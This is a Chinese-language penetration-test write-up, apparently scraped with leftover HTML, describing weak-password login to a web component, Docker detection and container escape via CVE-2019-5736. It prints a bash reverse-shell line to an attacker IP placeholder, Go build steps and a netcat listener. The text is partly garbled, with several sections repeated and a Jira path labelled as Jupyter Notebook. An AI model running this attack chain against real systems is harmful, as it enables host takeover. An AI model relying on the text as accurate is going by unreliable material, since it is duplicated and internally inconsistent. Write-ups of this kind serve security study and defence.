Docker逃逸实战：从弱口令到容器逃逸<\/h1>

0x01 前言<\/h2>
本文记录了一次完整的渗透测试过程，从发现弱口令漏洞开始，最终通过Docker逃逸技术获取宿主机权限。整个过程涉及信息收集、漏洞利用、Docker环境识别和容器逃逸技术。<\/p>

0x02 前期信息收集<\/h2>

目标系统架构<\/h3>

操作系统: Ubuntu<\/li>
Web服务器: Nginx + Java<\/li>

开放端口: 80, 443<\/li> <\/ul>

目录扫描结果<\/h3>

扫描发现了以下关键目录：<\/p>

\/jira\/<\/code> - Jupyter Notebook组件<\/li>
\/gitlab\/<\/code> - GitLab服务<\/li>
\/owncloud\/<\/code> - OwnCloud云存储<\/li>

\/confluence\/<\/code> - Confluence协作平台<\/li>
<\/ol>
0x03 漏洞测试<\/h2>
Jupyter Notebook组件测试<\/h3>


尝试未授权访问漏洞（已修复）<\/p>
<\/li>

发现两个信息泄露漏洞：<\/p>

\/jira\/secure\/ViewUserHover.jspa?username=admin<\/code><\/li>
\/jira\/rest\/api\/latest\/groupuserpicker?query=admin&maxResults=50&showAvatar=true<\/code><\/li>
<\/ul>
<\/li>

通过信息泄露获取用户列表，爆破出用户"Kevin"<\/p>
<\/li>
<\/ol>
突破点<\/h3>
尝试使用弱密码"123456"成功登录Jupyter Notebook组件<\/p>
0x04 Docker环境识别<\/h2>

通过New->Terminal进入命令行<\/li>
在根目录发现.dockerenv<\/code>文件<\/li>
检查系统进程的cgroup信息确认Docker环境<\/li>
<\/ol>
0x05 Docker逃逸技术<\/h2>
利用CVE-2019-5736漏洞<\/h3>

漏洞原理：该漏洞允许容器内用户通过覆盖宿主机上的runc二进制文件实现逃逸<\/li>
需要条件：

能够执行任意命令<\/li>
能够上传文件到容器<\/li>
能够重新进入容器<\/li>
<\/ul>
<\/li>
<\/ol>
利用步骤<\/h3>

获取POC代码：https:\/\/github.com\/Frichetten\/CVE-2019-5736-PoC<\/li>
修改main.go中的反弹shell命令：
command<\/span> :=<\/span> "\/bin\/bash -c 'bash -i >& \/dev\/tcp\/[YOUR_IP]\/[PORT] 0>&1'"<\/span>
<\/span><\/span><\/code><\/pre><\/li>
编译POC（需要Go环境）：
go build main.go
<\/span><\/span><\/code><\/pre><\/li>
上传编译后的exp到目标服务器<\/li>
在VPS上设置监听：
nc -lvnp [<\/span>PORT]<\/span>
<\/span><\/span><\/code><\/pre><\/li>
在目标容器中执行exp<\/li>
重新进入Jupyter Notebook的终端界面触发漏洞<\/li>
成功获取宿主机shell<\/li>
<\/ol>
结语<\/h2>

该漏洞利用需要重新进入容器才能触发<\/li>
实际利用中可能会遇到端口问题，需要尝试不同端口<\/li>
此漏洞利用可能导致Docker服务崩溃<\/li>
发现漏洞后应及时报告，避免进一步渗透<\/li>
<\/ol>
防御建议<\/h2>

避免使用弱密码<\/li>
及时更新Docker和runc版本<\/li>
限制容器内用户的权限<\/li>
定期检查容器环境的安全配置<\/li>
修复信息泄露漏洞<\/li>
<\/ol>
参考资源<\/h2>

CVE-2019-5736漏洞分析：https:\/\/www.freebuf.com\/articles\/web\/258398.html<\/li>
官方POC代码：https:\/\/github.com\/Frichetten\/CVE-2019-5736-PoC<\/li>
Docker安全最佳实践：https:\/\/docs.docker.com\/engine\/security\/<\/li>
<\/ol>

Docker逃逸实战：从弱口令到容器逃逸<\/h1>

0x01 前言<\/h2> 本文记录了一次完整的渗透测试过程，从发现弱口令漏洞开始，最终通过Docker逃逸技术获取宿主机权限。整个过程涉及信息收集、漏洞利用、Docker环境识别和容器逃逸技术。<\/p>

0x02 前期信息收集<\/h2>

0x03 漏洞测试<\/h2>

突破点<\/h3> 尝试使用弱密码"123456"成功登录Jupyter Notebook组件<\/p>

0x05 Docker逃逸技术<\/h2>

参考资源<\/h2> CVE-2019-5736漏洞分析：https:\/\/www.freebuf.com\/articles\/web\/258398.html<\/li> 官方POC代码：https:\/\/github.com\/Frichetten\/CVE-2019-5736-PoC<\/li> Docker安全最佳实践：https:\/\/docs.docker.com\/engine\/security\/<\/li> <\/ol>

0x01 前言<\/h2>
本文记录了一次完整的渗透测试过程，从发现弱口令漏洞开始，最终通过Docker逃逸技术获取宿主机权限。整个过程涉及信息收集、漏洞利用、Docker环境识别和容器逃逸技术。<\/p>

突破点<\/h3>
尝试使用弱密码"123456"成功登录Jupyter Notebook组件<\/p>

参考资源<\/h2>

CVE-2019-5736漏洞分析：https:\/\/www.freebuf.com\/articles\/web\/258398.html<\/li>
官方POC代码：https:\/\/github.com\/Frichetten\/CVE-2019-5736-PoC<\/li>
Docker安全最佳实践：https:\/\/docs.docker.com\/engine\/security\/<\/li> <\/ol>